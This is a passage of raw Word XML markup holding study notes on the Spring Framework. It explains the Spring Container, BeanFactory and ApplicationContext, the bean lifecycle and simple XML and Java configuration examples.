        <w:t>Spring Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for managing the lifecycle of objects. The container is responsible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instantiating</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configuring</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>managing</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the dependencies of beans (objects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC32DF" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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Key Responsibilities of the Spring Container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C88B9F" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1895"/>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Bean Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It creates objects (beans) based on the configuration provided (either through XML configuration or annotations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A14134" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1895"/>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Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It automatically injects dependencies into the beans based on the configuration (either via constructor injection, setter injection, or field injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F5E0E" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1895"/>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Lifecycle Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It manages the lifecycle of beans, including initialization and destruction, allowing for hooks to add custom logic during these phases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D803B8" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1895"/>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Scope Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It can manage the scope of beans, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0713925F" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1895"/>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Managing Bean Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It resolves and injects bean dependencies by looking up beans and wiring them based on the configuration (e.g., autowiring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E308FA" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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Types of Spring Containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC16B7" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1896"/>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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The simplest container, which provides fundamental features such as loading beans and dependency injection. However, it does not have all the features of a more advanced container like ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6057A6" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1896"/>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Commonly used when resources are constrained (e.g., in mobile applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F6E19" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1896"/>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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A more advanced container that extends BeanFactory. It is the most commonly used container in Spring. It provides additional features like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF730D" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1896"/>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Event propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED7585" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1896"/>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Declarative mechanisms to create a bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C220D8" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1896"/>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Internationalization (i18n) support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372DAC8" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1896"/>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A means to read and process application configuration (e.g., annotations, property files).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FFC1B" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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lastRenderedPageBreak/>
        <w:t>Common ApplicationContext Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B75C4B" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1897"/>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ClassPathXmlApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Loads the context from an XML file on the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C83D6" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1897"/>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AnnotationConfigApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Loads the context from annotated configuration classes (typically used for Java-based Spring configurations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A735F" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1897"/>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GenericWebApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for web-based applications, providing advanced features for working with Spring MVC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F68DA0F" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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Lifecycle Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44821D0F" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1898"/>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Bean Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the application starts, the Spring container reads the configuration (XML or annotations) and creates instances of beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA19759" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1898"/>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Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The container automatically injects dependencies into the beans according to the configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28381570" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1898"/>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Post-Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If any post-initialization hooks are configured (such as @PostConstruct or InitializingBean), the container invokes them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B36F1" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1898"/>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Bean Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans are then available for use by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F977970" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1898"/>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Destruction</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the application stops, the Spring container manages the destruction of beans, calling any defined destruction methods (@PreDestroy, DisposableBean, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711ABF3C" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A276340" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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XML-based Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44174ADE" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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lt;beans&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9FFE77" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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lt;bean id="car" class="com.example.Car"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F1F093" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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lt;property name="engine" ref="engine" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA70CF8" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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lt;/bean&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA97091" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625048C9" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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lt;bean id="engine" class="com.example.Engine" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D052641" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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lt;/beans&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09996049" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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Java-based Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F8DBC" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD4E7F" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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ComponentScan(basePackages = "com.example")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087938E1" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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public class AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87C1F1" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2808DA" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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In this setup, the Spring container will manage the Car and Engine beans, instantiating them and injecting the Engine dependency into Car.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E865EB" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9AB03B" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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In Spring, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Container (ApplicationContext)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for the entire lifecycle and management of objects (beans). It handles creation, configuration, dependency injection, and lifecycle management, freeing developers from manual object creation and dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E087E0" w14:textId="7E9FC8B2" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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3ED3890">
          <v:rect id="_x0000_i2120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADD9D8" w14:textId="6E463221" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD2381">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="446" w:name="_Toc196307926"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is ApplicationContext and its types in Spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w14:paraId="56A2DBC0" w14:textId="3F46D29E" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the central interface to the Spring IoC (Inversion of Control) container. It is an extension of BeanFactory, providing more advanced features such as event propagation, internationalization, and the ability to manage application context configurations in a more flexible manner. In Spring, ApplicationContext is the most commonly used container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D53EEC" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Key Features of ApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBCC55" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1899"/>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Bean management</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It manages the complete lifecycle of beans (objects), including their creation, initialization, and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AC899" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1899"/>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Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handles automatic injection of dependencies into beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702E68C0" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1899"/>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Event handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows beans to publish and listen to events, providing decoupled communication between components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F757F6B" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1899"/>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MessageSource</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
